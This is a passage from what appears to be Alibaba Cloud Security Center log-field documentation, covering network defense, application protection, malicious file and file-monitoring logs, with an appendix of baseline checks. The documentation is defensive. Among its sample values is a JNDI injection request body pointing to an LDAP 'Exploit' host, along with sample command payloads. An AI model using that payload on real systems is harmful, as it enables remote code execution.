風險產生的影響。格式為JSON字串。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

執行個體的子類型。取值:

  • 當執行個體類型為ECS時,子類型的取值:

    • INSTANCE

    • DISK

    • SECURITY_GROUP

  • 當執行個體類型為ACR時,子類型的取值:

    • REPOSITORY_ENTERPRISE

    • REPOSITORY_PERSON

  • 當執行個體類型為RAM時,子類型的取值:

    • ALIAS

    • USER

    • POLICY

    • GROUP

  • 當執行個體類型為WAF時,子類型的取值為DOMAIN

  • 當執行個體類型為其他值時,子類型的取值為INSTANCE

INSTANCE

instance_type

執行個體類型。取值:

  • ECS:雲端服務器。

  • SLB:負載平衡。

  • RDS:RDS資料庫。

  • MONGODB:MongoDB資料庫。

  • KVSTORE:Redis資料庫。

  • ACR:Container Registry。

  • CSK:CSK。

  • VPC:專用網路。

  • ACTIONTRAIL:Action Trail。

  • CDN:內容分發網路。

  • CAS:數位憑證管理服務(原SSL認證)。

  • RDC:雲效。

  • RAM:存取控制。

  • DDOS:DDoS防護。

  • WAF:Web Application Firewall。

  • OSS:Object Storage Service。

  • POLARDB:PolarDB資料庫。

  • POSTGRESQL:PostgreSQL資料庫。

  • MSE:微服務引擎。

  • NAS:檔案儲存體。

  • SDDP:Sensitive Data Discovery and Protection。

  • EIP:Elastic IP Address。

ECS

region_id

執行個體所在地區ID。

cn-hangzhou

requirement_id

條例ID。您可以通過ListCheckStandard - 雲平台配置檢查擷取標準列表介面擷取該ID。

5

risk_level

風險層級。取值:

  • LOW

  • MEDIUM

  • HIGH

MEDIUM

section_id

章節ID。您可以通過ListCheckResult - 查看雲產品中雲平台配置檢查風險項結果詳情介面擷取ID值。

1

standard_id

標準ID。您可以通過ListCheckStandard - 雲平台配置檢查擷取標準列表介面擷取該ID。

1

status

檢查項的狀態。取值:

  • NOT_CHECK:未檢查。

  • CHECKING:檢查中。

  • PASS:檢查通過。

  • NOT_PASS:檢查未通過。

  • WHITELIST:已加入白名單。

PASS

vendor

所屬雲廠商。固定取值:ALIYUN。

ALIYUN

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

網路防禦日誌

欄位名

說明

樣本

cmd

被攻擊的進程命令列。

nginx: master process nginx

cur_time

攻擊事件的發生時間。

2023-09-14 09:21:59

decode_payload

HEX格式轉換為字元的payload。

POST /Services/FileService/UserFiles/

dst_ip

被攻擊資產的IP地址。

172.16.XX.XX

dst_port

被攻擊資產的連接埠。

80

func

攔截事件的類型。取值:

  • payload:惡意負載類型,表示由於檢測到惡意資料或指令而觸發的攻擊事件攔截。

  • tuple:惡意IP類型,表示由於檢測到惡意IP訪問而觸發的攻擊事件攔截。

payload

rule_type

攔截事件的具體規則類型。取值:

  • alinet_payload:Security Center指定的payload事件防禦規則。

  • alinet_tuple:Security Center指定的tuple事件防禦規則。

alinet_payload

instance_id

被攻擊資產的執行個體ID。

i-2zeg4zldn8zypsfg****

internet_ip

被攻擊資產的公網IP。

39.104.XX.XX

intranet_ip

被攻擊資產的私網IP。

192.168.XX.XX

final_action

防禦動作模式。取值:block(已攔截)。

block

payload

HEX格式的payload。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

被攻擊的進程ID。

7107

platform

被攻擊資產的系統類別型。取值:

  • win

  • linux

linux

proc_path

被攻擊的進程路徑。

/usr/sbin/nginx

sas_group_name

伺服器在Security Center的資產分組。

default

src_ip

發起攻擊的源IP地址。

106.11.XX.XX

src_port

發起攻擊的源連接埠。

29575

uuid

伺服器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

應用防護日誌

欄位名

說明

樣本

app_dir

應用所在目錄。

/usr/local/aegis/rasp/apps/1111

app_id

應用ID。

6492a391fc9b4e2aad94****

app_name

應用程式名稱。

test

confidence_level

檢測演算法的信賴度。取值:

  • high

  • medium

  • low

low

request_body

請求體資訊。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

請求體長度。

112

data

hook點參數。

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

要求標頭資訊。

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

主機或網路裝置的名稱。

testhostname

host_ip

主機私網IP地址。

172.16.XX.XX

is_cliped

該條日誌是否因為超長被裁剪過。取值:

  • true:已裁剪

  • false:未裁剪

false

jdk_version

JDK版本。

1.8.0_292

message

警示描述資訊。

Unsafe class serial.

request_method

要求方法。

Post

platform

作業系統類型。

Linux

arch

作業系統架構。

amd64

kernel_version

作業系統核心版本。

3.10.0-1160.59.1.el7.x86_64

param

請求參數,常見格式包括:

  • GET參數。

  • application/x-www-form-urlencoded。

{"url":["http://127.0.0.1.xip.io"]}

payload

有效攻擊載荷。

bash -c kill -0 -- -'31098'

payload_length

有效攻擊載荷長度。

27

rasp_id

應用防護探針唯一ID。

fa00223c8420e256c0c98ca0bd0d****

rasp_version

應用防護探針版本。

0.8.5

src_ip

要求者IP地址。

172.0.XX.XX

final_action

警示處理結果。取值:

  • block:防護,即阻斷。

  • monitor:監控。

block

rule_action

規則指定的警示處理方式。取值:

  • block

  • monitor

block

risk_level

風險層級。取值:

  • high

  • medium

  • low

high

stacktrace

堆棧資訊。

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

觸發警示的時間。

2023-10-09 15:19:15

timestamp

觸發警示的時間戳記,單位為毫秒。

1696835955070

type

漏洞類型。取值:

  • attach:惡意Attach。

  • beans:惡意beans綁定。

  • classloader:惡意類載入。

  • dangerous_protocol:危險協議使用。

  • dns:惡意DNS查詢。

  • engine:引擎注入。

  • expression:運算式注入。

  • file:惡意檔案讀寫。

  • file_delete:任意檔案刪除。

  • file_list:目錄遍曆。

  • file_read:任意檔案讀取。

  • file_upload:惡意檔案上傳。

  • jndi:JNDI注入。

  • jni:JNI注入。

  • jstl:JSTL任意檔案包含。

  • memory_shell:記憶體馬注入。

  • rce:命令執行。

  • read_object:還原序列化攻擊。

  • reflect:惡意反射調用。

  • sql:SQL注入。

  • ssrf:惡意外連。

  • thread_inject:線程注入。

  • xxe:XXE攻擊。

rce

url

請求URL。

http://127.0.0.1:999/xxx

rasp_attack_uuid

漏洞UUID。

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

主機UUID。

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

主機公網IP地址。

1.2.XX.XX

intranet_ip

主機私網IP地址。

172.16.XX.XX

sas_group_name

Security Center伺服器分組名稱。

分組1

instance_id

主機執行個體ID。

i-wz995eivg28f1m**

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

惡意檔案檢測日誌

欄位名

說明

樣本

bucket_name

Bucket名稱。

***-test

event_id

警示ID。

802210

event_name

警示名稱。

挖礦程式

md5

檔案的MD5值。

6bc2bc******53d409b1

sha256

檔案的SHA256值。

f038f9525******7772981e87f85

result

檢測結果。取值:

  • 0:檔案安全。

  • 1:存在惡意檔案。

0

file_path

檔案路徑。

test.zip/bin_test

etag

OSS檔案標識。

6BC2B******853D409B1

risk_level

風險等級。取值:

  • serious:緊急。

  • suspicions:可疑。

  • remind:提醒。

remind

source

檢測情境。

  • OSS:在Security Center控制台執行對阿里雲Object Storage ServiceBucket內檔案的檢測。

  • API:通過SDK接入的方式檢測惡意檔案,支援通過Java或Python方式接入。

OSS

parent_md5

父類檔案或壓縮包檔案的MD5值。

3d0f8045bb9******

parent_sha256

父類檔案或壓縮包檔案的SHA256值。

69b643d6******a3fb859fa

parent_file_path

父類檔案或壓縮包檔案的名稱。

test.zip

start_time

開始時間戳,單位秒, 也用於表示事件發生的時間。

1719472214

核心檔案監控事件記錄

欄位名

說明

樣本

start_time

事件的最新發生時間。單位為秒。

1718678414

uuid

用戶端的UUID。

5d83b26b-b**a-4**a-9267-12****

file_path

檔案路徑。

/etc/passwd

proc_path

進程路徑。

/usr/bin/bash

rule_id

命中規則ID。

123

rule_name

規則名稱。

file_test_rule

cmdline

命令列。

bash /opt/a

operation

對檔案的操作。

READ

risk_level

警示等級。

2

pid

進程ID。

45324

proc_permission

進程許可權。

rwxrwxrwx

instance_id

執行個體ID。

i-wz995eivg2****

internet_ip

互連網IP。

192.0.2.1

intranet_ip

私網IP。

172.16.0.1

instance_name

執行個體名稱。

aegis-test

platform

作業系統類型。

Linux

附錄

基準類型及子類型列表

類型名稱

子類型名稱

描述

hc_exploit

hc_exploit_redis

高危風險利用-Redis未授權訪問高危風險

hc_exploit_activemq

高危風險利用-ActiveMQ未授權訪問高危風險

hc_exploit_couchdb

高危風險利用-CouchDB未授權訪問高危風險

hc_exploit_docker

高危風險利用-Docker未授權訪問高危風險

hc_exploit_es

高危風險利用-Elasticsearch未授權訪問高危風險

hc_exploit_hadoop

高危風險利用-Hadoop未授權訪問高危風險

hc_exploit_jboss

高危風險利用-Jboss未授權訪問高危風險

hc_exploit_jenkins

高危風險利用-Jenkins未授權訪問高危風險

hc_exploit_k8s_api

高危風險利用Kubernetes-Apiserver未授權訪問高危風險

hc_exploit_ldap

高危風險利用-LDAP未授權訪問高危風險(Windows環境)

hc_exploit_ldap_linux

高危風險利用-openLDAP未授權訪問高危風險(Linux環境)

hc_exploit_memcache

高危風險利用-Memcached未授權訪問高危風險

hc_exploit_mongo

高危風險利用-Mongodb未授權訪問高危風險

hc_exploit_pgsql

高危風險利用-Postgresql未授權訪問高危風險基準

hc_exploit_rabbitmq

高危風險利用-RabbitMQ未授權訪問高危風險

hc_exploit_rsync

高危風險利用-rsync未授權訪問高危風險

hc_exploit_tomcat

高危風險利用-Apache Tomcat AJP檔案包含漏洞風險

hc_exploit_zookeeper

高危風險利用-ZooKeeper未授權訪問高危風險

hc_container

hc_docker

阿里雲標準-Docker安全基準檢查

hc_middleware_ack_master

國際通用安全最佳實務-Kubernetes(ACK) Master節點安全基準檢查

hc_middleware_ack_node

國際通用安全最佳實務-Kubernetes(ACK) Node節點安全基準檢查

hc_middleware_k8s

阿里雲標準-Kubernetes-Master安全基準檢查

hc_middleware_k8s_node

阿里雲標準-Kubernetes-Node安全基準檢查

cis

hc_suse 15_djbh

等保三級-SUSE 15合規基準檢查

hc_aliyun_linux3_djbh_l3

等保三級-Alibaba Cloud Linux 3合規基準檢查

hc_aliyun_linux_djbh_l3

等保三級-Alibaba Cloud Linux/Aliyun Linux 2合規基準檢查

hc_bind_djbh

等保三級-Bind合規基準檢查

hc_centos 6_djbh_l3

等保三級-CentOS Linux 6合規基準檢查

hc_centos 7_djbh_l3

等保三級-CentOS Linux 7合規基準檢查

hc_centos 8_djbh_l3

等保三級-CentOS Linux 8合規基準檢查

hc_debian_djbh_l3

等保三級-Debian Linux 8/9/10合規基準檢查

hc_iis_djbh

等保三級-IIS合規基準檢查

hc_informix_djbh

等保三級-Informix合規基準檢查

hc_jboss_djbh

等保三級-Jboss合規基準檢查

hc_mongo_djbh

等保三級-MongoDB合規基準檢查

hc_mssql_djbh

等保三級-SQL Server合規基準檢查

hc_mysql_djbh

等保三級-MySql合規基準檢查

hc_nginx_djbh

等保三級-Nginx合規基準檢查

hc_oracle_djbh

等保三級-Oracle合規基準檢查

hc_pgsql_djbh

等保三級-PostgreSql合規基準檢查

hc_redhat 6_djbh_l3

等保三級-Redhat Linux 6合規基準檢查

hc_redhat_djbh_l3

等保三級-Redhat Linux 7合規基準檢查

hc_redis_djbh

等保三級-Redis合規基準檢查

hc_suse 10_djbh_l3

等保三級-SUSE 10合規基準檢查

hc_suse 12_djbh_l3

等保三級-SUSE 12合規基準檢查

hc_suse_djbh_l3

等保三級-SUSE 11合規基準檢查

hc_ubuntu 14_djbh_l3

等保三級-Ubuntu 14合規基準檢查

hc_ubuntu_djbh_l3

等保三級-Ubuntu 16/18/20合規基準檢查

hc_was_djbh

等保三級-Websphere Application Server合規基準檢查

hc_weblogic_djbh

等保三級-Weblogic合規基準檢查

hc_win 2008_djbh_l3

等保三級-Windows 2008 R2合規基準檢查

hc_win 2012_djbh_l3

等保三級-Windows 2012 R2合規基準檢查

hc_win 2016_djbh_l3

等保三級-Windows 2016/2019 合規基準檢查

hc_aliyun_linux_djbh_l2

等保二級-Alibaba Cloud Linux/Aliyun Linux 2合規基準檢查

hc_centos 6_djbh_l2

等保二級-CentOS Linux 6合規基準檢查

hc_centos 7_djbh_l2

等保二級-CentOS Linux 7合規基準檢查

hc_debian_djbh_l2

等保二級-Debian Linux 8合規基準檢查

hc_redhat 7_djbh_l2

等保二級-Redhat Linux 7合規基準檢查

hc_ubuntu_djbh_l2

等保二級-Ubuntu16/18合規基準檢查

hc_win 2008_djbh_l2

等保二級-Windows 2008 R2合規基準檢查

hc_win 2012_djbh_l2

等保二級-Windows 2012 R2合規基準檢查

hc_win 2016_djbh_l2

等保二級-Windows 2016/2019 合規基準檢查

hc_aliyun_linux_cis

國際通用安全最佳實務-Alibaba Cloud Linux/Aliyun Linux 2安全基準檢查

hc_centos 6_cis_rules

國際通用安全最佳實務-CentOS Linux 6安全基準檢查

hc_centos 7_cis_rules

國際通用安全最佳實務-CentOS Linux 7安全基準檢查

hc_centos 8_cis_rules

國際通用安全最佳實務-CentOS Linux 8安全基準檢查

hc_debian 8_cis_rules

國際通用安全最佳實務-Debian Linux 8安全基準檢查

hc_ubuntu 14_cis_rules

國際通用安全最佳實務-Ubuntu 14安全基準檢查

hc_ubuntu 16_cis_rules

國際通用安全最佳實務-Ubuntu 16/18/20安全基準檢查

hc_win 2008_cis_rules

國際通用安全最佳實務-Windows Server 2008 R2安全基準檢查

hc_win 2012_cis_rules

國際通用安全最佳實務-Windows Server 2012 R2安全基準檢查

hc_win 2016_cis_rules

國際通用安全最佳實務-Windows Server 2016/2019 R2安全基準檢查

hc_kylin_djbh_l3

等保三級-麒麟合規基準檢查

hc_uos_djbh_l3

等保三級-Uos合規基準檢查

hc_best_security

hc_aliyun_linux

阿里雲標準-Alibaba Cloud Linux/Aliyun Linux 2安全基準檢查

hc_centos 6

阿里雲標準-CentOS Linux 6安全基準檢查

hc_centos 7

阿里雲標準-CentOS Linux 7/8安全基準檢查

hc_debian

阿里雲標準-Debian Linux 8/9/10安全基準檢查

hc_redhat 6

阿里雲標準-Redhat Linux 6安全基準檢查

hc_redhat 7

阿里雲標準-Redhat Linux 7/8安全基準檢查

hc_ubuntu

阿里雲標準-Ubuntu安全基準檢查

hc_windows_2008

阿里雲標準-Windows 2008 R2安全基準檢查

hc_windows_2012

阿里雲標準-Windows 2012 R2安全基準檢查

hc_windows_2016

阿里雲標準-Windows 2016/2019 安全基準檢查

hc_db_mssql

阿里雲標準-SQL server安全基準檢查

hc_memcached_ali

阿里雲標準-Memcached安全基準檢查

hc_mongodb

阿里雲標準-MongoDB 3.x版本安全基準檢查

hc_mysql_ali

阿里雲標準-Mysql安全基準檢查

hc_oracle

阿里雲標準-Oracle 11g安全基準檢查

hc_pgsql_ali

阿里雲標準-PostgreSql安全基準檢查

hc_redis_ali

阿里雲標準-Redis安全基準檢查

hc_apache

阿里雲標準-Apache安全基準檢查

hc_iis_8

阿里雲標準-IIS 8安全基準檢查

hc_nginx_linux

阿里雲標準-Nginx安全基準檢查

hc_suse 15

阿里雲標準-SUSE Linux 15安全基準檢查

tomcat 7

阿里雲標準-Apache Tomcat 安全基準檢查

weak_password

hc_mongodb_pwd

弱口令-MongoDB登入弱口令檢測(支援2.x版本)

hc_weakpwd_ftp_linux

弱口令-FTP登入弱口令檢查

hc_weakpwd_linux_sys

弱口令-Linux系統登入弱口令檢查

hc_weakpwd_mongodb 3

弱口令-MongoDB登入弱口令檢測

hc_weakpwd_mssql

弱口令-SQL Server資料庫登入弱口令檢查

hc_weakpwd_mysql_linux

弱口令-Mysql資料庫登入弱口令檢查

hc_weakpwd_mysql_win

弱口令-Mysql資料庫登入弱口令檢查(Windows版)

hc_weakpwd_openldap

弱口令-Openldap登入弱口令檢查

hc_weakpwd_oracle

弱口令-Oracle登入弱口令檢測

hc_weakpwd_pgsql

弱口令-PostgreSQL資料庫登入弱口令檢查

hc_weakpwd_pptp

弱口令-pptpd服務登入弱口令檢查

hc_weakpwd_redis_linux

弱口令-Redis資料庫登入弱口令檢查

hc_weakpwd_rsync

弱口令-rsync服務登入弱口令檢查

hc_weakpwd_svn

弱口令-svn服務登入弱口令檢查

hc_weakpwd_tomcat_linux

弱口令-Apache Tomcat控制台弱口令檢查

hc_weakpwd_vnc

弱口令-VncServer弱口令檢查

hc_weakpwd_weblogic

弱口令-Weblogic 12c登入弱口令檢測

hc_weakpwd_win_sys

弱口令-Windows系統登入弱口令檢查

相關文檔